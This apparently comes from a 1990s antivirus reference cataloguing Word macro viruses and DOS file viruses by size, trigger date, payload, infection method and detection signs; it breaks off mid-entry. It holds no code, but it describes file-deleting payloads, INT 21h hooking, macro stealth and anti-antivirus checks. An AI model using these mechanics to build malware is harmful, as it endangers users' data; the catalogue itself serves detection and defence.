Date_of_origin: Fall 1996
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.ABC.A infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when they
are saved (FileSaveAs).
Word.ABC.A is one of the very few non-destructive macro viruses. It
only infects other files and displays the following message:
" I am happy; are you too? "
When the "Colin" macro triggers, it adds the following text to the
File|Properties section of infected documents:
" Smash Technology "
" Resist Oppression "
[Word.CeeFour.A]
Virus Name: Word.Ceefour.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 6
Encrypted: Yes
Size_of_macros: 4062 Bytes
Place_of_origin: USA
Date_of_origin: Spring 1997
Destructive: Yes
Trigger_date: April 1st
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CeeFour.A infects the global template when an infected document
is opened. Further documents become infected when they are
saved.
Word.CeeFour.A uses ToolsMacro and FileTemplates to make recognition of
an infected document more difficult (called macro stealth technique).
When a user selects on of the two options, CeeFour.A displays the
following message:
" A serious error has occoured in sub program: MenuBar "
When a document is saved on April 1st, CeeFour.A triggers and does the
following:
1. LABEL the partition of the first hard drive to " C4_BY_KARL "
2. Delete all files on C:\
3. Delete C:\COMMAND.COM
4. Delete C:\WINDOWS\WIN.COM
The following comments can be found in the CEEFOUR macro:
" C-4 By Karl "
" You are about to have a very bad day. "
" It looks like C4 in the mothers arm. "
" We are both professional, This is personal. "
" And when Alexander saw the bredth of his domain he wept for there "
" were no more worlds to conquer (benefits of a classical education)"
" quotes from the masters! "
[Word.CeeFour.B]
Virus Name: Word.Ceefour.B
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 6
Encrypted: Yes
Size_of_macros: 4019 Bytes
Place_of_origin: UK
Date_of_origin: February 1997
Destructive: Yes
Trigger_date: April 1st
Password: None
Seen_In_The_Wild: Yes
Seen_where: UK
DESCRIPTION:
The main difference between this new variant and the previous
CeeFour.A virus is that the code has been slightly modified.
For more information, please refer to the CeeFour.A virus
description.
[Word.Chaka.A]
Virus Name: Word.Chaka.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 1 or 3
Encrypted: No
Size_of_macros: 741 (845 or 843) Bytes
Place_of_origin: Germany
Date_of_origin: Summer 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Chaka.A infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (FileOpen - DateiOeffnen in the German version of Microsoft
Word) or closed (DocClose - DateiSchliessen in the German version of
Microsoft Word).
Word.Chaka does not do anything besides infecting other files.
[Word.Chandigarh.A]
Virus Name: Word.Chandigarh.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 1
Encrypted: Yes
Size_of_macros: 244 Bytes
Place_of_origin: India
Date_of_origin: May 1996
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Chandigarh.A infects the global template when an infected document
is opened. Further documents become infected when they are also
opened (AutoOpen).
Word.Chandigarh.A does nothing else besides infecting other files.
The following comment can be found inside the code of Chandigarh:
" This Code was written in Chandigarh (India) on 01.05.1996 "
[Word.Cheat.A]
Virus Name: Word.Cheat.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 1
Encrypted: No
Size_of_macros: 249 Bytes
Place_of_origin: Unknown
Date_of_origin: Summer 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Cheat.A is another intended macro virus. Due to bugs in the code
it does not infect other files.
[Word.Cheat.B]
Virus Name: Word.Cheat.B
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 1
Encrypted: No
Size_of_macros: 279 Bytes
Place_of_origin: Unknown
Date_of_origin: Summer 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Cheat.B is another intended macro virus. Due to bugs in the code
it does not infect other files.
[Word.Vicis.A]
Virus Name: Word.Vicis.A
Virus Type: Word Macro Virus
Alias: Vicissitator
Platform: Word 6/7
Number_of_macros: 1 or 2 (global template)
Encrypted: No
Size_of_macros: differs
Place_of_origin: Unknown
Date_of_origin: July 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Vicis.A infects the global template when an infected document is
saved. Further documents become infected when they are also
saved (FileSave).
Word.Vicis.A is another polymorphic virus that changes itself.
Whenever a user saves a document while the global template (normal.dot)
is infected, Word.Vicis.A calls its mutating code.
Due to a bug some variants will fail to infect further files.
Executing the corrupted FileSave macro causes Microsoft Word to
display an error message.
While simple scan string scanners should have no problem
detecting Vicis.A, exact CRC scanners will fail to do so.
Word.Vicis.A uses ToolsMacro to make recognition of an infected
document more difficult (called macro stealth technique).
The following comment can be found within the ToolsMacro macro:
" You have been Infected by the Vicissitator Macro Virus. "
" (C)1997 CyberYoda A Member of the SLAM Virus Team "
Word.Vicis.A was distributed in July, 1997 in a virus writing magazine.
[Word.Black.A]
Virus Name: Word.Black.A
Virus Type: Word Macro Virus
Alias: BlackDeath
Platform: Word 6/7
Number_of_macros: 3
Encrypted: Yes
Size_of_macros: 1355 Bytes
Place_of_origin: USA
Date_of_origin: June 1997
Destructive: Yes
Trigger_date: Friday 13th
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Black infects the global template when an infected document
is opened. Further documents become infected when they are
also opened (AutoOpen).
The following comment can be found in the AutoExec macro:
" REM Fuck Micro$oft! "
On Friday the 13th Black displays the following message:
" Your computer is now lost to the ages... "
" WM.BlackDeath "
" Written on 6/6/1997 "
On the same day, Black deletes the following files:
" C:\*.COM "
" C:\*.EXE "
" C:\WINDOWS\*.INI "
" C:\WINDOWS\*.COM "
" C:\WINDOWS\*.HLP "
" C:\WINDOWS\*.CPL
" C:\WINDOWS\*.BMP "
" C:\AOL\ORGANIZER\*.* "
" C:\AOL\LDB\*.* "
[Word.AntiConcept.A]
Virus Name: Word.AntiConcept.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 4 or 3
Encrypted: No
Size_of_macros: 1263 (1216) Bytes
Place_of_origin: USA
Date_of_origin: Summer 1997
Payload: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.AntiConcept.A infects the global template (normal.dot) when an
infected document is opened. Further documents become infected when
they are saved (FileSave and FileSaveAs).
Word.AntiConcept.A disables the Concept virus by removing some of its
macros.
When an infected document is opened for the first time,
Word.AntiConcept displays the following message:
" Your system may or may not be clean. "
" Please close CleanW and then open it again "
Word.AntiConcept.A is an unnatural devolved variant with FileNew
missing in its macro set. Due to the missing macro, Microsoft Word
displays an error message.
[Word.Archer.A]
Virus Name: Word.Archer.A
Virus Type: Word Macro Virus
Alias: ArchFiend
Platform: Word 6/7
Number_of_macros: 6
Encrypted: No
Size_of_macros: 2360 Bytes
Place_of_origin: USA
Date_of_origin: July 1997
Payload: Yes
Trigger_date: 5th
Password: Random
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Archer.A infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when they
are also opened and saved (FileSaveAs).
Word.Archer.A removes FileTemplates and ToolsCustomize to make
recognition of an infected document more difficult (called macro stealth
technique).
When a user selects ToolsMacro, Word.Archer.A adds the following
comment to C:\AUTOEXEC.BAT:
" echo BLOW ME! "
Word.Archer.A also checks the system time and in case of a 13 in the
seconds field, it adds a password to the saved document. If you find a
document with an unknown password, please download a copy of WinWord
Password Recovery Tool (wwprt). It is available at: www.vdsarg.com.
The second payload, which is triggered on the 5th of each month, tries
to delete files on Macintosh systems or delete all bitmap (*.BMP) files
in the following directory:
" C:\WINDOWS "
[Word.Armadillo.A]
Virus Name: Word.Armadillo.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 4
Encrypted: Yes
Size_of_macros: 1265 Bytes
Place_of_origin: USA
Date_of_origin: Spring 1997
Payload: Yes
Trigger_date: Mondays
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Armadillo.A infects the global template (normal.dot) when an
infected document is opened. Further documents become infected when
they are saved (FileSaveAs).
Word.Armadillo uses ToolsMacro to make recognition of an infected
document more difficult (called macro stealth technique).
If a user selects ToolsMacro, Armadillo adds the following text 10,000
times to the active document:
" Armadillon Macro? "
When a user starts Microsoft Word on a Tuesday and the global template
is infected, Armadillo displays the following message:
" Liven up Monday with an Armadillon! "
[Word.Cult.A]
Virus Name: Word.Cult.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 1
Encrypted: No
Size_of_macros: 1688 Bytes
Place_of_origin: Germany
Date_of_origin: Summer 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Cult.A is another intended macro virus. Due to bugs in the code
it does not infect other files.
The following comment can be found inside the code:
" CULT! Nightmare Joker (SLAM) "
[Word.CVCK1.A]
Virus Name: Word.CVCK1.A
Virus Type: Word Macro Virus
Alias: Chicken-Pox 0.1
Platform: Word 6/7
Number_of_macros: 11
Encrypted: Yes
Size_of_macros: 7315 Bytes
Place_of_origin: Indonesia
Date_of_origin: 1997
Destructive: No
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.A infects the global template when an infected document is
closed. Further documents become infected when they are also
closed (AutoClose).
Word.CVCK1.A uses ToolsMacro, ToolsCustomize and FileTemplates to make
recognition of an infected document more difficult (called macro
stealth technique).
When a user selects one of the options, Word.CVCK1.A displays the
following:
" Chicken say ......... "
an empty picture and
" [pox-poX-pOX-POX-POx-Pox-pox] "", .Push2
The following comments can be found within the code:
" -------------------------------------------- "
" Created using CVCK v.01 b "
" (C)CrazybitS 1997, Yogyakarta, Indonesia "
" -------------------------------------------- "
and
" Sorry ... i'm defeat you ! "
[Word.CVCK1.B]
Virus Name: Word.CVCK1.B
Virus Type: Word Macro Virus
Alias: Foxz
Platform: Word 6/7
Number_of_macros: 10
Encrypted: Yes
Size_of_macros: 5551 Bytes
Place_of_origin: Indonesia
Date_of_origin: 1997
Payload: Yes
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.B infects the global template when an infected document is
opened. Further documents become infected when they are
closed (AutoClose).
Word.CVCK1.B uses ToolsMacro and FileTemplates to make recognition of
an infected document more difficult (called macro stealth technique).
When a user selects one of the options, Word.CVCK1.B displays the
following:
" Err = 0 "
Another message is displayed on the 1st and 13th of each month.
Word.CVCK1.B also tries to disable printing on Sundays.
The following comments can be found within the code:
" Foxz members of NoMercy "
" thank's for decrypt this virus "
" you may learn the effect Or somthing Else "
" bye,"."".""." "
" Foxz "
" If you found bug please contact me at "
" idban"@" hotmail.com "
and
" Foxz Techno "
" Member Of NoMercy "
[Word.CVCK1.C]
Virus Name: Word.CVCK1.C
Virus Type: Word Macro Virus
Alias: Vampire, 80e
Platform: Word 6/7
Number_of_macros: 6 or 9 (global template)
Encrypted: Yes
Size_of_macros: 3158 (5759) Bytes
Place_of_origin: Indonesia
Date_of_origin: 1997
Destructive: Yes
Trigger_date: Fridays
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.C infects the global template when an infected document is
opened. Further documents become infected when they are closed
(AutoClose).
Word.CVCK1.C uses ToolsMacro, ToolCustomize and FileTemplates to make
recognition of an infected document more difficult (called macro
stealth technique).
When a user selects one of the options, Word.CVCK1.C deletes all WIN.*
files in the Windows directory and displays the following message:
" No risk, No Pain "
Another payload triggers on Fridays when Word.CVCK1.C erases all text
from documents.
The following comments can be found within the code of Word.CVCK1.C:
" Created using CVCK v.01 b "
" (C)CrazybitS 1997, Yogyakarta, Indonesia "
" Name : WM.80e aliase Vampire "
[Word.CVCK1.D]
Virus Name: Word.CVCK1.D
Virus Type: Word Macro Virus
Alias: Vampire, 80e
Platform: Word 6/7
Number_of_macros: 6 or 9 (global template)
Encrypted: Yes
Size_of_macros: 3912 (5547) Bytes
Place_of_origin: Indonesia
Date_of_origin: 1997
Payload: Yes
Trigger_date: 13th of each month
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.D infects the global template when an infected document is
opened. Further documents become infected when they are closed
(AutoClose).
Word.CVCK1.D uses ToolsMacro, ToolCustomize and FileTemplates to make
recognition of an infected document more difficult (called macro
stealth technique).
When a user selects one of the options, Word.CVCK1.D displays the
following message: (also displayed on the 13th of each month)
" Visit NoMercy WEB PAGE ! "
" Welcome Again buddy! "
" It's nice create a Virus, why you don't try? "
The following comments can be found within the code of Word.CVCK1.D:
" -------------------------------------------- "
" Created using CVCK v.01 b "
" (C)CrazybitS 1997, Yogyakarta, Indonesia "
" -------------------------------------------- "
" greeting to "
" -Cicatrix major collector "
" -D.Giovanni "
" -All Macro virii creator "
" -You that has seen the decription macro "
and
" Sorry ... i'm defeat you ! "
[Word.CVCK1.E]
Virus Name: Word.CVCK1.E
Virus type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 10
Encrypted: Yes
Size_of_macros: 5527 Bytes
Place_of_origin: Indonesia
Date_of_origin: 1997
Payload: Yes
Trigger_date: Sundays
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
The main difference between this new variant and the previous
Word.CVCK1.B viruses is that the Action, Actiondate, and AutoOpen
macros were modified.
Word.CVCK1.E infects the global template when an infected document is
opened. Further documents become infected when they are closed
(AutoClose).
Word.CVCK1.E uses ToolsMacro and FileTemplates to make recognition of
an infected document more difficult (called macro stealth technique).
Word.CVCK1.E also tries to disable printing on Sundays.
The following comment can be found within the code of Word.CVCK1.E:
" -------------------------------------------- "
" Hey you..... "
" This again from NoMercy... "
" created by Fox`z "
" -------------------------------------------- "
[Word.CVCK1.F]
Virus Name: Word.CVCK1.F
Virus type: Word Macro Virus
Alias: Billy Mahone
Platform: Word 6/7
Number_of_macros: 6 or 9 (global template)
Encrypted: Yes
Size_of_macros: 2209 or 2338 Bytes
Place_of_origin: Unknown
Date_of_origin: 1997
Payload: Yes
Trigger_date: 13th of each month
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.F seems to be the first macro virus, created with the
CVCK1 virus generator, that was not modified after its creation.
Word.CVCK1.F infects the global template when an infected document
is opened. Further documents become infected when they are closed
(AutoClose).
Word.CVCK1.F uses ToolsMacro, ToolsCustomize and FileTemplates to make
recognition of an infected document more difficult (called macro
stealth technique).
When Word.CVCK1.F triggers (on the 13th of each month), it displays
the following message:
" Billy Mahone is back!!! "
(More obscure than the virus itself is the name of the virus author,
which is a character in the movie " Flatliners ").
The following comment can be found within the code of Word.CVCK1.G:
" Sorry ... i'm defeat you ! "
and
" Just bypass Nothing to do! "
[Word.CVCK1.G]
Virus Name: Word.CVCK1.G
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 5
Encrypted: Yes
Size_of_macros: 2029 Bytes
Place_of_origin: Unknown
Date_of_origin: 1997
Payload: Yes
Trigger_date: 13th of each month
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.G seems to be another creation of the author
of Word.CVCK1.F. It contains another reference to the movie
"Flatliners."
Word.CVCK1.G infects the global template when an infected document is
opened. Further documents become infected when they are closed
(AutoClose).
When Word.CVCK1.G triggers (on the 13th of each month), it displays the
following message:
" Put me in the sate of death "
The following comment can be found within the code of Word.CVCK1.G:
" Sorry ... i'm defeat you ! "
and
" Just bypass Nothing to do! "
[Word.CVCK1.H]
Virus Name: Word.CVCK1.H
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 5
Encrypted: Yes
Size_of_macros: 2031 Bytes
Place_of_origin: Unknown
Date_of_origin: 1997
Payload: Yes
Trigger_date: 13th of each month
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.CVCK1.H seems to be another creation of the author
of Word.CVCK1.F and Word.CVCK1.G! It contains another reference to
the movie "Flatliners."
Word.CVCK1.H infects the global template when an infected document is
opened. Further documents become infected when they are closed
(AutoClose).
When Word.CVCK1.H triggers (on the 13th of each month), it displays
the following message:
" Today is a good day to die!!! "
The following comment can be found within the code of Word.CVCK1.H:
" Sorry ... i'm defeat you ! "
and
" Just bypass Nothing to do! "
[Word.CVCK1.I]
Virus Name: Word.CVCK1.I
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 11
Encrypted: Yes
Size_of_macros: 7329 Bytes
Place_of_origin: Unknown
Date_of_origin: 1997
Payload: Yes
Trigger_date: 11th and 31st of each month
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
The main difference between this new variant and the previous
Word.CVCK1.A virus is that the code has been slightly modified.
For more information, please refer to the Word.CVCK1.A virus
description.
[Word.Czech.A]
Virus Name: Word.Czech.A
Virus Type: Word Macro Virus
Alias: None
Platform: Word 6/7
Number_of_macros: 2
Encrypted: Yes
Size_of_macros: 424 Bytes
Place_of_origin: Unknown
Date_of_origin: Spring 1997
Payload: None
Trigger_date: None
Password: None
Seen_In_The_Wild: No
Seen_where:
DESCRIPTION:
Word.Czech.A infects the global template when an infected document
is opened. Further documents become infected when they are also
opened and saved (FileSave).
Word.Czech.A is another do-nothing macro virus, being only infectious.
[Version]
Virus Name: Version
Virus Type: Memory resident, File Virus (COM files)
Virus Length: 708 bytes
PC Vector Hooked: INT 21h
Execution Procedure:
1) It decodes its first three bytes.
2) Checks whether or not it is memory resident. If it is,
goes back to the original routine directly. Otherwise, it loads
itself resident in the high memory, then hooks INT 21h and goes
back to the original routine.
Infection Procedure:
1) Hooks INT 21h (AH=30h) to display an incorrect DOS version.
2) Hooks INT 21h (AX=4203h) to verify whether or not the memory has
been infected (returns AX=6969h).
3) Hooks INT 21h(AX=4B00h)to infect COM files.
Damage: The call for retrieving the DOS version does not run correctly.
Note: This virus does not run correctly due to errors in its codes.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 705 bytes.
[Versikee-1326]
Virus Name: Versikee-1326
Virus Type: File Virus (EXE files)
Virus Length: 1326 bytes
Execution Procedure: Searches for an uninfected EXE file and
infects it (it only infects one file at a time). The searching
path is from the current directory to its subdirectory, to
subdirectories under the last subdirectory, to root directory, to
subdirectories under the root directory. If there is an infectable
file, it checks the system time. If the Seconds value is a multiple
of 8, the virus destroys the first five bytes of the file. Otherwise,
the virus just infects it. It then goes back to the original routine.
Damage: Destroys the first five bytes of a file depending on the value
of the Seconds field.
Note: Date and time fields of infected files are not changed.
Detection method: Length of infected files increase. The
algorithm is: first it adds the original length to make it a
multiple of 16, and then increases its length by 1326 bytes.
[163]
Virus Name: 163
Virus Type: File Virus (COM files)
Virus Length: 163 bytes
Execution Procedure:
1) Infects uninfected COM files on the current directory. If there
are no COM files on the current directory or at least one file is
already infected, the virus goes back to the original routine.
Infection Procedure:
(1) Moves the first 163 bytes of the original file at the end.
(2) Writes the virus code onto the first 163 bytes. The file gets
corrupted if it is less than 163 bytes.
Damage: None
Note:
1) Does not infect the same file.
2) Date and time fields of infected files are not changed.
Detection method:
1) Infected files increase by 163 bytes.
2) Check for "*.COM" starting from the 19Dh byte of the file.
[Vengence-A]
Virus Name: Vengence-A
Other Name: Vengence-194
Virus Type: File Virus (*.C* files)
Virus Length: 194 bytes
Execution Procedure: It infects all *.C* files on the current
directory.
Infection Procedure: Overwrites the first 194 bytes of the file
with the virus code. If the original file is less than 194 bytes,
the file will be 194 bytes after infection; otherwise, the length
would not change.
Damage: It overwrites the first 194 bytes of the original file with
the virus code, thus corrupting the file.
Detection method:
1) Date and time fields of infected files are changed.
2) The following text can be found at the end of infected files:
"Vengence-A virus. Lastest release from Swedish Virus
Association. Released 7th of May 1992. Happy hacking and
greetings to all Virus writers..."
[Vengence-B]
Virus Name: Vengence-B
Other Name: Vengence-252
Virus Type: File Virus (*.C*, mainly COM files)
Virus Length: 252 bytes
Execution Procedure: It infects *.C* files on the current
directory.
Infection Procedure: Overwrites the first 252 bytes of the file
with the virus code. If the original file is less than 252 bytes,
the file will be 252 bytes after infection; otherwise, the length
would not change.
Damage: It overwrites the first 252 bytes of the original file thus
corrupting the file.
Note: Date and time fields of infected files are not changed.
Detection method:
The following text can be found at the end of infected files:
"Vengence-B virus. Lastest release from Swedish Virus
Association. Released 8th of May 1992. Satan will come and
rule his world and his people!"
[Vengence-C]
Virus Name: Vengence-C
Other Name: Vengence-390
Virus Type: File Virus (*.C*, mainly COM files)
Virus Length: 390 bytes
Execution Procedure: It infects the first *.C* file on the
current directory.
Infection Procedure: Overwrites the first 390 bytes of the file
with the virus code. If the original file is less than 390 bytes,
the file will be 390 bytes after infection; otherwise, the length
would not change.
Damage: It overwrites the first 390 bytes of the original file thus
corrupting the file.
Note:
1) Date and time fields of infected files are not changed.
2) When the virus is executed, it checks first for any anti-virus
software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
TBSCANX. The virus stops executing if any of these programs exist.
Detection method:
The following text can be found at the end of infected files:
"Vengence-C virus. Lastest release from Swedish Virus
Association. Released 8th of May 1992. Satan will come and
rule his world and his people!"
[Vengence-D]
Virus Name: Vengence-D
Other Name: Vengence-435
Virus Type: File Virus (*.C*, mainly COM files)
Virus Length: 435 bytes
Execution Procedure:
1) Checks whether or not the current time is 12:00(AM). If it is,
it displays the following message and then increases the system
time by an hour.
"Vengence-D virus. Lastest release from Swedish Virus
Association. Released 8th of May 1992. Satan will come and
rule his world and his people!"
2) Infects the first *.C* file on the current directory.
Infection Procedure: Overwrites the first 435 bytes of the file
with the virus code. If the original file is less than 435 bytes,
the file will be 435 bytes after infection; otherwise, the length
would not change.
Damage: It overwrites the first 435 bytes of the original file thus
corrupting the file.
Note:
1) Date and time fields of infected files are not changed.
2) When the virus is executed, it checks first for any anti-virus
software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
TBSCANX. The virus stops executing if any of these programs exist.
Detection method: Check for the text mentioned above.
[Vengence-F]
Virus Name: Vengence-F
Other Name: Vengence-656
Virus Type: File Virus (*.C*, mainly COM files)
Virus Length: 656 bytes
Execution Procedure:
1) Checks whether or not the current time is 12:00(AM). If it is,
it displays the following message and then increases the system
time by an hour.
"Vengence-F virus. Debugging session unlimited."
2) Infects the first *.C* file on the current, its father, its
father's father directory, and so on.
Infection Procedure: Moves the first 656 bytes of the file at the
end and then writes the virus code onto the first 656 bytes. It then
attaches "SVC" at the end of the file.
Damage: Infected files cannot execute.
Note:
1) Date and time fields of infected files are not changed.
2) When the virus is executed, it checks:
- whether it is being traced by Debug. If it is, it halts the system.
- for anti-virus programs like F-LOCK, F-POPUP, F-FCHK, F-DLOCK,
ThunderByte and TBSCANX. If any of these programs exist, the virus
stops executing.
Detection method:
1) Check for the text mentioned above.
2) Check for the word "SVC" at the end of infected files.
3) Infected files increase by 656 bytes.
Cleaning Method: Delete the first 656 bytes and "SVC" at the end of
infected files. If the file is larger than 656 bytes, move the last
656 bytes up front.
[V500]
Virus Name: V500
Virus Type: Memory Resident(OS), File Virus (COM files)
Virus Length: 500 bytes
PC Vectors Hooked: INT 21H
Execution Procedure: The virus checks whether the DOS version is 3.3.
If not, it goes back to the original routine directly. Otherwise, it
stays resident in the memory (OS area).
While in the memory the virus calls INT 86h to infect COM files when
INT 00h-0Ch is called. It then goes back to the original routine. The
virus reinfects files.
Infection Procedure: The virus moves the first 500 bytes of the file
at the end, then writes the virus code on front.
Damage: None
Note: Date and time fields of infected files are not changed.
Detection method: Infected files increase by 500 bytes.
[Crazy-L15]
Virus Name: Crazy-I15
Virus Type: Memory Resident(HiMem), File Virus (COM files)
Virus Length: 1,402 bytes
PC vectors Hooked: Int 21h, INT 24h
Execution Procedure:
1) Checks whether or not it resides in the memory. If not, it loads
itself resident in the high memory.
2) Hooks INT 21h.
3) Goes back to the original routine.
Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. First, it
hangs INT 24h to prevent divulging its trace when writing,
then checks whether the program to be executed is an uninfected
COM file. If it is, the virus infects it. Lastly, it restores
INT 24h.
Damage: None
Detection method: Infected files increase by 1402 bytes.
[Variety]
Virus Name: Variety
Virus Type: File Virus (COM files)
Virus Length: 625 bytes
Execution Procedure:
1) The virus decodes.
2) Infects a COM file on the current directory (it only infects
one file at a time).
Infection Procedure:
1) It encodes the virus code.
2) Attaches the viral code at the end of the original file.
Damage: None
Note:
1) If the DOS version is not above 2.0, the virus will not infect
files.
2) Time and date fields of infected files are not changed.
Detection method: Infected files increase by 625 bytes.
[Infector]
Virus Name: Infector
Virus Type: File Virus (COM files)
Virus Length: 820-830 bytes
Execution Procedure:
Searches for an uninfected COM file on the current directory, and
then proceeds to infect it (it only infects one file at a time).
Damage: None
Note:
1) Most infected files cannot be executed due to the poor quality
of the virus procedure.
2) Does not stay in the memory.
3) You will see an error message when writing because INT 24h has
not been hanged.
Detection method: Infected files increase by 820 to 830 bytes.
[Irish-3]
Virus Name: Irish-3
Virus Type: File Virus (COM files)
Virus Length: 1164 bytes
PC Vectors Hooked: INT 21h, INT 1Ch
Execution Procedure:
1) Checks whether or not it is memory resident. If not, it loads
itself resident in the high memory.
2) Hooks INT 21h,INT 1Ch and goes back to the original routine.
Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. It
checks whether the program to be executed is an uninfected COM
file. If it is, the virus infects it. If it is an uninfected
EXE file, the virus creates a new COM file (with length between
2000 and 4000 bytes) with the same file name as the original EXE file.
This new COM file contains the virus code.
Damage: None
Note:
1) If the current date is November 21, it counts time by hooking INT
08h. After a few minutes, it displays the following message:
"Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30
June.................................. ...................."
2) You will see an error message when writing because INT 24h has
not been hanged.
Detection method: Infected files increase by 1164 bytes.
[101]
Virus Name: 101
Virus Type: File Virus
Virus Length: 2560 bytes
Execution Procedure: When all the files (COM and EXE) have been
infected in the current drive, the virus will check the system date
to determine whether it is a multiple of 9 (for example 9th, 18th,
27th). If "yes," all the text on the screen will be confused and
down-shifted. If not the virus will modify the boot sector and continue
to infect another drive.
Damage: All the files (COM and EXE) will be infected and increased by
2560 Bytes. Infected file contains the string "VIRUS 101".
[1339]
Virus Name: 1339
Other Names: Vacsina virus
Virus Type: Parasitic Virus
Virus Length: 1339 bytes
Symptoms: Increases infected .COM file sizes by 1339 bytes, .EXE files
by 1471 bytes. Infected files contain the word "VACSINA". Decreases the
size of free RAM memory.
Damage: No damage, no manipulation.
Note: First the virus tests to determine if it is already in memory
(it uses interrupt vector 31h for this purpose). If it is not in memory
yet, it installs itself before the infected program (using MCB
modification, it allocates 1344 bytes). After installation the virus
monitors DOS EXEC function and infects all uninfected programs. This
virus is one of a group of viruses which cooperates with each other.
This group has every virus of its own level, a virus can remove some
other Vacsina with lower level 10h. It can remove viruses with level
less than 10h. To spread, a Vacsina virus uses direct interrupt 21h.
[1701/1704]
Virus Name: 1701/1704
Other Names: Raindrop virus
Virus Type: Parasitic Virus
Virus Length: 1701/1704 bytes
Symptoms: Increases infected .COM file sizes by 1701/1704 bytes when
the system date is between October and December, 1988. Five minutes
after installation, virus will scan all the characters on screen
and down-shift one by one as if it were raining.
Damage: No damage. System will halt after virus is activated.
[2881]
Virus Name: 2881
Other Names: Yankee Doodle virus
Virus Type: Parasitic Virus
Virus Length: 2881 bytes
Symptoms: Increases infected file size by approximately 2881 bytes and
decreases the size of free RAM memory. Infected .COM files display
7A4Fh and 2Ch as their end words (flagf for other viruses, for example:
for Vacsina virus). Virus will play "Yankee Doodle" when some
conditions are met (see damage).
Damage: Ping-Pong virus modification: it modifies the Ping-Pong virus
in memory. It changes two bytes, one jump and adds one subroutine. It
is very interesting that Ping-Pong virus is ready for this change.
After this reboot (it writes this count to all disks) and after 255
reboots, the Ping-Pong virus immediately deactivates into the memory
(it returns original interrupt vector 13h and the value of 0:413h).
Subsequently, "Yankee Doodle" is played.
[2928]
Virus Name: 2928
Other Names: Yankee Doodle virus
Virus Type: Parasitic Virus
Virus Length: 2928 bytes
Symptoms: Increases infected file size by approximately 2928 bytes and
decreases the size of free RAM memory. Infected .COM files display
7A4Fh and 29h as their end words (flagf for other viruses, for example:
for Vacsina virus). Virus will play "Yankee Doodle" when some
conditions are met (see damage).
Damage: Ping-Pong virus modification: it modifies Ping-Pong virus in
memory. It changes two bytes, one jump and adds one subroutine.
(It's interesting that Ping-Pong virus is ready for this change.)
After this reboot (it writes this count to all disks), and after 255
reboots, the Ping-Pong virus immediately deactivates into memory (it
returns original interrupt vector 13h and the value of 0:413h).
Subsequently, "Yankee Doodle" is played.
Special features: It seems that this virus is an older version of the
2881 virus. It is also one of a large virus group. With its level 29h
it is one of the previous releases of the same virus. It has the same
mechamism, causes the same damage (except that virus 2881 doesn't play
the melody every day, so it cannot be detected as early). The code of
virus 2881 is optimized, so the new version is shorter (about 47
bytes).
[3584]
Virus Name: 3584
Other Names: Fish 6
Virus Type: Parasitic Virus, Memory resident
Virus Length: 3584 bytes
Symptoms: Increases infected file size by 3584 bytes. Decreases the
size of free RAM memory by 6KB.
Damage: Virus displays the message "FISH VIRUS #6 - EACH DIFF BONN
2/90 '~knzyvo}'" on the screen using function 9 of interrupt 21h and
halts the computer using instruction HLT.
[4096]
Virus Name: Virus 4096
Virus Type: File Virus
Virus Length: 4096 bytes
Execution Procedure: A boot sector will be modified if the system date
is later than September 21. The text "FRODO LIVES" will then appear on
the screen after booting from a modified disk. The virus code is
corrupted so that when you run the infected file after September 21,
